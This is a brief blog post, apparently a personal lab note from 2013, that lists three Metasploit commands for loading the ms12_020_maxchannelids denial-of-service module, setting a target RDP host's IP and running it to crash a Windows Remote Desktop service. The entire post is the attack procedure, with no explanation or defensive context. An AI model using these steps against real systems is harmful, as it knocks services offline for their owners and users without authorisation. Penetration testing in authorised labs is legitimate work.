Sunday, April 14, 2013

ms12_020_maxchannelids metasploit module - quick note

1. use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

2. set RHOST 192.168.169.145

3. run

No comments:

Post a Comment